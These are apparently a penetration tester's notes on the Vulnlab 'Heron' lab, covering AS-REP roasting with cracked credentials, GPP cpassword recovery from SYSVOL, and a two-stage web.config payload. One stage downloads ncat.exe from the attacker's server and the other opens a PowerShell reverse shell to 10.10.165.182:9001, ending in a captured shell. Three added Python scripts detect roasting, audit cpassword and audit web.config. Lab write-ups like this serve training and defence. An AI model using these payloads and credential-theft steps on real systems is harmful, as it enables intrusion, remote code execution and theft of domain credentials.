Here are my notes on the HERON box from Vulnlab.
HERON:
mucdc.heron.vl:10.10.255.101
Nmap scan report for 10.10.255.101
Host is up (0.00042s latency).
Not shown: 1145 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
CEO:
wayne.wood@heron.vl
Head of IT:
julian.pratt@heron.vl
Accounting:
samuel.davies@heron.vl
accounting.heron.vl site #Found via the accounting$ SMB share as svc-web-accounting-d.
88/tcp open kerberos
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.255.101 -usersfile users.txt heron.vl/
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'GetNPUsers.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$samuel.davies@HERON.VL:25bef58d185fab4832a5b64d1afe7217$cdc84e9a5996280901cdef12200ad31c9c5917a3b5a9585f04ea025e1677aa326b9698c50d5c4cf84a3a4f121e926e8229bc91d411d72021eb24ac88a93ad462659c6188bbb1ae2358f4e90d92e49b2f55fd3c314dabf3b26ac25f9dadc17aa2fa74c947683d3b447fc3e35c197b0bbab72d5deba2784aa809bfeceb793a2af54fc24a9dbe19ffb7b99e87a7b929f9a303da3d94169f2d641ddef4f151f67fc2d455efe015158c6b863f3caaee6ad4e94860b96d5ba24e333e3595f18596025b663b30bef408dc32c2b492b8033244ba8289b1e3fd592533e9760a26692ac2dd2e5934fb
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat users.txt
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l6fkiy9oN ($krb5asrep$23$samuel.davies@HERON.VL)
1g 0:00:00:05 DONE (2024-10-26 13:02) 0.1718g/s 22520p/s 22520c/s 22520C/s mari10..kovacs
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
CRED DISCOVERED!
samuel.davies:l6fkiy9oN
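Defender's view of the roast above, as an added example that is not part of these notes: the request that produced the cracked AS-REP appears on the DC as Security event 4768 with Pre-Authentication Type 0 and Ticket Encryption Type 0x17. The sample events and their source IPs are constructed.

```python
"""Flag AS-REP roasting in Windows Security event 4768 (Kerberos TGT requested).

Added example: the events are constructed to mirror the GetNPUsers run above.
The roastable request is the one the KDC answered with Status 0x0 although
Pre-Authentication Type is 0 (no pre-auth), and the AS-REP was RC4 (0x17).
Keys follow the EventData field names of the 4768 event XML.
"""
from collections import defaultdict

PREAUTH_NONE = 0      # "Logon without Pre-Authentication": DONT_REQUIRE_PREAUTH set
RC4_HMAC = 0x17       # etype 23: crackable offline with john/hashcat
STATUS_SUCCESS = 0x0

# Constructed sample. IPs are made up; only the first entry is a roast.
SAMPLE_4768 = [
    {"TargetUserName": "samuel.davies", "IpAddress": "::ffff:10.10.14.5",
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "julian.pratt", "IpAddress": "::ffff:10.10.255.50",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "wayne.wood", "IpAddress": "::ffff:10.10.14.5",
     "Status": "0x18", "PreAuthType": "2", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "svc-web-accounting", "IpAddress": "::ffff:10.10.255.51",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x17"},
]


def _num(value):
    """Parse '0x17', '0' or '-' (Windows prints '-' for N/A) to int or None."""
    try:
        return int(value, 0)
    except (TypeError, ValueError):
        return None


def classify(ev):
    """Severity string for one 4768 event, or None when nothing is roastable."""
    if _num(ev.get("Status")) != STATUS_SUCCESS:
        return None                         # no ticket issued, nothing to crack
    if _num(ev.get("PreAuthType")) != PREAUTH_NONE:
        return None                         # pre-auth enforced: AS-REP not free
    if _num(ev.get("TicketEncryptionType")) == RC4_HMAC:
        return "high: AS-REP roastable, RC4-encrypted reply"
    return "medium: AS-REP roastable, AES reply (slower to crack)"


def find_asrep_roasting(events):
    """Map source IP -> [(user, severity)] for TGTs issued without pre-auth."""
    findings = defaultdict(list)
    for ev in events:
        severity = classify(ev)
        if severity:
            findings[ev["IpAddress"]].append((ev["TargetUserName"], severity))
    return dict(findings)


def accounts_without_preauth(events):
    """Remediation list: accounts that got a TGT with Pre-Authentication Type 0.

    Clear DONT_REQUIRE_PREAUTH on each, or give it a long random password
    if the flag is genuinely required by a legacy client.
    """
    return sorted({ev["TargetUserName"] for ev in events
                   if _num(ev.get("Status")) == STATUS_SUCCESS
                   and _num(ev.get("PreAuthType")) == PREAUTH_NONE})


if __name__ == "__main__":
    for ip, hits in find_asrep_roasting(SAMPLE_4768).items():
        for user, severity in hits:
            print(f"{ip}  {user}: {severity}")
    print("fix:", ", ".join(accounts_without_preauth(SAMPLE_4768)))
```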
sudo impacket-GetUserSPNs -request -dc-ip 10.10.255.101 heron.vl/samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# sudo impacket-GetUserSPNs -request -dc-ip 10.10.255.101 heron.vl/samuel.davies
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------- ------------------ -------------------------------- -------------------------- -------------------------- ----------
accounting/mucdc.heron.vl svc-web-accounting CN=audit,CN=Users,DC=heron,DC=vl 2024-06-01 11:07:44.428061 2024-06-07 06:34:23.314374
[-] type object 'CCache' has no attribute 'parseFile'
#NOPE, no hash.
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
crackmapexec smb 10.10.255.101 -u samuel.davies -p l6fkiy9oN --shares
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' --shares
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
SMB 10.10.255.101 445 MUCDC [+] Enumerated shares
SMB 10.10.255.101 445 MUCDC Share Permissions Remark
SMB 10.10.255.101 445 MUCDC ----- ----------- ------
SMB 10.10.255.101 445 MUCDC accounting$
SMB 10.10.255.101 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.255.101 445 MUCDC C$ Default share
SMB 10.10.255.101 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.255.101 445 MUCDC home$ READ
SMB 10.10.255.101 445 MUCDC IPC$ Remote IPC
SMB 10.10.255.101 445 MUCDC it$
SMB 10.10.255.101 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.255.101 445 MUCDC SYSVOL READ Logon server share #Interesting.
SMB 10.10.255.101 445 MUCDC transfer$ READ,WRITE #NOPE
#FROM ASREPROASTING ATTACK.
smbclient \\\\10.10.255.101\\SYSVOL -U "samuel.davies%l6fkiy9oN"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun May 26 05:37:40 2024
.. D 0 Sun May 26 05:37:40 2024
heron.vl Dr 0 Sun May 26 05:37:40 2024
6261499 blocks of size 4096. 1960798 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> dir
. D 0 Sun May 26 05:38:59 2024
.. D 0 Sun May 26 05:37:40 2024
DfsrPrivate DHSr 0 Sun May 26 05:38:59 2024
Policies D 0 Tue Jun 4 11:57:41 2024
scripts D 0 Sun Jun 2 06:42:56 2024
6261499 blocks of size 4096. 1960798 blocks available
smb: \heron.vl\> cd scripts
smb: \heron.vl\scripts\> dir
. D 0 Sun Jun 2 06:42:56 2024
.. D 0 Sun May 26 05:38:59 2024
bginfo.bgi A 2009 Sun Jun 2 06:42:45 2024
Bginfo64.exe A 2774440 Sun Jun 2 06:41:18 2024
logon.vbs A 351 Sun Jun 2 06:43:52 2024 #Interesting.
mask ""
recurse
prompt
mget *
tree -r .
.
├── scripts
│ ├── bginfo.bgi
│ └── Bginfo64.exe
├── Policies
│ ├── {866ECED1-24B0-46EF-92F5-652345A1820C}
│ │ ├── User
│ │ ├── Machine
│ │ │ ├── Scripts
│ │ │ │ ├── Startup
│ │ │ │ └── Shutdown
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ └── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ └── GPT.INI
│ ├── {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
│ │ ├── User
│ │ ├── Machine
│ │ │ └── Preferences
│ │ │ └── Groups
│ │ │ └── Groups.xml #Interesting !
│ │ └── GPT.INI
│ ├── {6AC1786C-016F-11D2-945F-00C04fB984F9}
┌──(root㉿kali)-[/home/…/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences]
└─# cd Groups
┌──(root㉿kali)-[/home/…/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups]
└─# ls
Groups.xml
┌──(root㉿kali)-[/home/…/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2024-06-04 15:59:45" uid="{535B586D-9541-4420-8E32-224F589E4F3A}"><Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="HERON\svc-web-accounting" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-24602"/><Member name="HERON\svc-web-accounting-d" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-26101"/></Members></Properties></Group>
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2024-06-04 16:00:13" uid="{F3B0115E-D062-46CC-B10C-C3EB743C824A}"><Properties action="U" newName="_local" fullName="" description="local administrator" cpassword="1G19pP9gbIPUr5xLeKhEUg==" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
</Groups>
crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' -M gpp_password
https://github.com/t0thkr1s/gpp-decrypt
https://dan-feliciano.com/2024/06/28/heron/
crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' -M gpp_password
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
GPP_PASS... 10.10.255.101 445 MUCDC [+] Found SYSVOL share
GPP_PASS... 10.10.255.101 445 MUCDC [*] Searching for potential XML files containing passwords
GPP_PASS... 10.10.255.101 445 MUCDC [*] Found heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.255.101 445 MUCDC [+] Found credentials in heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.255.101 445 MUCDC Password: H3r0n2024#!
GPP_PASS... 10.10.255.101 445 MUCDC action: U
GPP_PASS... 10.10.255.101 445 MUCDC newName: _local
GPP_PASS... 10.10.255.101 445 MUCDC fullName:
GPP_PASS... 10.10.255.101 445 MUCDC description: local administrator
GPP_PASS... 10.10.255.101 445 MUCDC changeLogon: 0
GPP_PASS... 10.10.255.101 445 MUCDC noChange: 0
GPP_PASS... 10.10.255.101 445 MUCDC neverExpires: 1
GPP_PASS... 10.10.255.101 445 MUCDC acctDisabled: 0
GPP_PASS... 10.10.255.101 445 MUCDC subAuthority: RID_ADMIN
GPP_PASS... 10.10.255.101 445 MUCDC userName: Administrator (built-in)
H3r0n2024#!
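An added SYSVOL audit, not from these notes or the tools linked above: it walks a local copy of the Policies folder like the one mget'd earlier and reports every Group Policy Preferences element that still carries a cpassword, which is what the gpp_password module acts on. The Groups.xml is reconstructed from the one shown above; the temp-directory layout is constructed.

```python
"""Audit Group Policy Preferences XML under SYSVOL for leftover cpassword values.

Added example. Walks a local copy of the Policies folder (such as the tree
mget'd above), parses each Preferences XML type that can carry a cpassword and
reports the element, the policy GUID and the account it configures, without
logging the value. The Groups.xml is reconstructed from the one shown above;
the directory layout is created in a temp dir so the script runs offline.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Preference files that may carry cpassword, and the per-type account attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
 <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)">
  <Properties action="U" groupSid="S-1-5-32-544" groupName="Administrators (built-in)">
   <Members><Member name="HERON\\svc-web-accounting" action="ADD"/></Members>
  </Properties>
 </Group>
 <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
       changed="2024-06-04 16:00:13" uid="{F3B0115E-D062-46CC-B10C-C3EB743C824A}">
  <Properties action="U" newName="_local" description="local administrator"
              cpassword="1G19pP9gbIPUr5xLeKhEUg==" userName="Administrator (built-in)"/>
 </User>
</Groups>
"""


def findings_in_file(path):
    """One finding per element in `path` that stores a cpassword."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []
    parent = {child: node for node in root.iter() for child in node}
    policy = GUID_RE.search(path)
    out = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:                      # Group/Members etc. hold no secret
            continue
        owner = parent.get(elem, elem)       # the <User>/<Service>/... around <Properties>
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        out.append({"file": path,
                    "policy": policy.group(0) if policy else "",
                    "element": owner.tag, "name": owner.get("name", ""),
                    "changed": owner.get("changed", ""),
                    "account": account, "new_name": elem.get("newName", ""),
                    "action": elem.get("action", ""),
                    "cpassword_len": len(cpw)})   # length only, never the value
    return out


def scan_policies(root_dir):
    """Walk a Policies tree (SYSVOL copy) and collect cpassword findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                findings.extend(findings_in_file(os.path.join(dirpath, name)))
    return findings


def demo():
    """Drop the constructed Groups.xml into a SYSVOL-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gdir = os.path.join(tmp, "Policies", "{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}",
                            "Machine", "Preferences", "Groups")
        os.makedirs(gdir)
        with open(os.path.join(gdir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_policies(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['policy']} {f['element']} {f['name']!r}: sets {f['account']!r}"
              f" (renamed {f['new_name']!r}) with a stored cpassword; rotate and remove it")
```

Any hit is a finding regardless of the value: the cpassword AES key is public, so the credential counts as exposed until the preference item is deleted and the password rotated.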
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.255.101 -u users.txt -p 'H3r0n2024#!' --shares
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\svc-web-accounting-d:H3r0n2024#!
SMB 10.10.255.101 445 MUCDC [+] Enumerated shares
SMB 10.10.255.101 445 MUCDC Share Permissions Remark
SMB 10.10.255.101 445 MUCDC ----- ----------- ------
SMB 10.10.255.101 445 MUCDC accounting$ READ,WRITE
SMB 10.10.255.101 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.255.101 445 MUCDC C$ Default share
SMB 10.10.255.101 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.255.101 445 MUCDC home$ READ
SMB 10.10.255.101 445 MUCDC IPC$ Remote IPC
SMB 10.10.255.101 445 MUCDC it$
SMB 10.10.255.101 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.255.101 445 MUCDC SYSVOL READ Logon server share
SMB 10.10.255.101 445 MUCDC transfer$ READ,WRITE
svc-web-accounting-d:H3r0n2024#!
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# smbclient \\\\10.10.255.101\\accounting$ -U 'svc-web-accounting-d%H3r0n2024#!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Oct 26 14:39:52 2024
.. DHS 0 Sun Jun 2 11:26:14 2024
AccountingApp.deps.json A 37407 Sun Jun 2 15:25:26 2024
AccountingApp.dll A 89600 Sun Jun 2 15:25:26 2024
AccountingApp.exe A 140800 Sun Jun 2 15:25:26 2024
AccountingApp.pdb A 39488 Sun Jun 2 15:25:26 2024
AccountingApp.runtimeconfig.json A 557 Sat Jun 1 18:22:20 2024
appsettings.Development.json A 127 Sat Jun 1 18:00:54 2024
appsettings.json A 237 Sat Jun 1 18:03:50 2024
FinanceApp.db A 106496 Sat Jun 1 10:09:00 2024
Microsoft.AspNetCore.Authentication.Negotiate.dll A 53920 Wed Nov 1 05:08:26 2023
Microsoft.AspNetCore.Cryptography.Internal.dll A 52912 Mon May 20 08:23:52 2024
Microsoft.AspNetCore.Cryptography.KeyDerivation.dll A 23712 Mon May 20 08:23:56 2024
Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll A 108808 Mon May 20 08:24:24 2024
Microsoft.Data.Sqlite.dll A 172992 Mon May 20 03:54:40 2024
Microsoft.EntityFrameworkCore.Abstractions.dll A 34848 Mon May 20 03:54:30 2024
Microsoft.EntityFrameworkCore.dll A 2533312 Mon May 20 03:55:04 2024
Microsoft.EntityFrameworkCore.Relational.dll A 1991616 Mon May 20 03:55:20 2024
Microsoft.EntityFrameworkCore.Sqlite.dll A 257456 Mon May 20 03:55:30 2024
Microsoft.Extensions.DependencyModel.dll A 79624 Tue Oct 31 18:59:24 2023
Microsoft.Extensions.Identity.Core.dll A 177840 Mon May 20 08:24:10 2024
Microsoft.Extensions.Identity.Stores.dll A 45232 Mon May 20 08:24:20 2024
Microsoft.Extensions.Options.dll A 64776 Thu Jan 18 06:05:26 2024
runtimes D 0 Sat Jun 1 10:51:32 2024
SQLitePCLRaw.batteries_v2.dll A 5120 Wed Aug 23 22:41:24 2023
SQLitePCLRaw.core.dll A 50688 Wed Aug 23 22:38:38 2023
SQLitePCLRaw.provider.e_sqlite3.dll A 35840 Wed Aug 23 22:38:52 2023
System.DirectoryServices.Protocols.dll A 71944 Tue Oct 31 19:00:24 2023
web.config A 554 Thu Jun 6 10:41:39 2024 #Interesting
wwwroot D 0 Sat Jun 1 10:51:32 2024
smb: \> get web.config
getting file \web.config of size 554 as web.config (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\AccountingApp.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
The share name is accounting, so the vhost is the accounting.heron.vl website, which requires credentials.
Since we can modify web.config, we can get RCE out of it.
web.config RCE (malicious payload in the web.config file):
-Only works if you can modify the web.config file through SMB, FTP or another exploited vulnerability.
Uploading web.config for Fun and Profit 2
https://ethicxz.github.io/VL-Heron-Chain/#getting-a-shell-on-the-windows-machine
https://medium.com/@jeroenverhaeghe/rce-from-web-config-461a5eab8ce9
AspNetCoreModuleV2 section of a web.config file:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.webServer>
<handlers>
<remove name="aspNetCore" />
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd" arguments="/C ping 127.0.0.1 > c:/output.txt" hostingModel="OutOfProcess"/>
</system.webServer>
</configuration>
Two-stage payload used here; the earlier iterations were identical apart from the attacker IP (10.10.173.54 instead of 10.10.165.182) and dropping the binary as nc.exe instead of ncat.exe.
Stage 1 - web.config that downloads ncat.exe from the attacker's web server:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.165.182:8000/ncat.exe -OutFile %TEMP%\ncat.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Stage 2 - web.config that connects back with the dropped binary:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\ncat.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Requesting accounting.heron.vl/toto executes the web.config payload.
#This only works from frajmp.heron.vl, since MUCDC cannot ping Kali.
Example:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.165.182:8000/ncat.exe -OutFile %TEMP%\nc.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\nc.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
-Swap the two web.config versions in turn (download stage, then connect-back stage) to get a user shell on MUCDC.
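Added example, not part of these notes: a web.config audit a defender could run over IIS application roots, fed the legitimate web.config from the accounting$ share and the connect-back variant above. The two XML strings are copied from the notes; the checks and the app_dll default (AccountingApp.dll, from the share listing) are mine.

```python
"""Audit IIS web.config files for ASP.NET Core handler abuse.

Added example. IIS hands requests matching the AspNetCoreModuleV2 handler to
the process named in <aspNetCore processPath=...>; if a writable share lets an
attacker rewrite web.config, that process can be cmd.exe. The audit flags a
processPath that is neither the dotnet host nor the app's own executable, shell
interpreters, dotnet arguments other than the app DLL, remote URLs, and a
handler bound to one odd path (payload fires only on that request). The two
configs are the legitimate and the payload web.config from the notes above.
"""
import re
import xml.etree.ElementTree as ET

LEGIT_WEB_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\AccountingApp.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
"""

PAYLOAD_WEB_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\nc.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
"""

DOTNET_HOSTS = {"dotnet", "dotnet.exe"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
          "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def _basename(path):
    """Last component of a Windows or POSIX path, lower-cased, quotes stripped."""
    return path.strip().strip('"\'').replace("\\", "/").rsplit("/", 1)[-1].lower()


def audit_web_config(xml_text, app_dll="AccountingApp.dll"):
    """Return a list of findings; an empty list means the config looks sane.

    app_dll is the application's own assembly (the only thing `dotnet` should
    be asked to run); it defaults to the one in the accounting$ listing above.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    app_exe = app_dll[:-4].lower() + ".exe" if app_dll.lower().endswith(".dll") else app_dll.lower()
    findings = []
    for add in root.iter("add"):
        if add.get("modules") == "AspNetCoreModuleV2" and add.get("path") != "*":
            findings.append(f"handler bound to a single path {add.get('path')!r}"
                            " (payload fires only when that URL is requested)")
    for core in root.iter("aspNetCore"):
        proc = core.get("processPath") or ""
        args = core.get("arguments") or ""
        base = _basename(proc)
        if base in SHELLS:
            findings.append(f"processPath launches a shell interpreter: {proc}")
        elif base not in DOTNET_HOSTS and base != app_exe:
            findings.append(f"processPath is neither dotnet nor {app_exe}: {proc}")
        elif base in DOTNET_HOSTS and not re.fullmatch(
                r"(\.[\\/])?" + re.escape(app_dll), args.strip(), re.I):
            findings.append(f"dotnet asked to run something other than {app_dll}: {args}")
        if re.search(r"https?://", args, re.I):
            findings.append(f"arguments reference a remote URL: {args}")
        if core.get("hostingModel", "").lower() == "outofprocess" and base not in DOTNET_HOSTS:
            findings.append("OutOfProcess hosting of a non-dotnet process: IIS spawns it on demand")
    return findings


if __name__ == "__main__":
    for label, cfg in (("legit", LEGIT_WEB_CONFIG), ("payload", PAYLOAD_WEB_CONFIG)):
        hits = audit_web_config(cfg)
        print(f"{label}: {'OK' if not hits else str(len(hits)) + ' finding(s)'}")
        for h in hits:
            print("  -", h)
```

The content check is the detective half; the preventive fix on this box is the share ACL, since the web service account should never be able to write its own web.config.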
pentest@frajmp:/tmp$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.165.181 51807
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\webaccounting> whoami
whoami
heron\svc-web-accounting
PS C:\webaccounting> hostname
hostname
mucdc
USER-SHELL as svc-web-accounting of MUCDC !
PS C:\> whoami
whoami
heron\svc-web-accounting
PS C:\> hostname
hostname
mucdc
PS C:\> dir
dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/1/2024 8:10 AM home
d----- 5/26/2024 2:31 AM inetpub
d----- 6/6/2024 7:22 AM it
d----- 10/28/2024 7:36 AM Microsoft
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 6/6/2024 7:22 AM Program Files
d----- 6/1/2024 7:30 AM Program Files (x86)
d----- 10/28/2024 6:29 AM transfer
d-r--- 6/1/2024 8:43 AM Users
d----- 10/28/2024 7:37 AM webaccounting
d----- 6/2/2024 8:26 AM Windows
-a---- 6/2/2024 3:45 AM 36 flag.txt
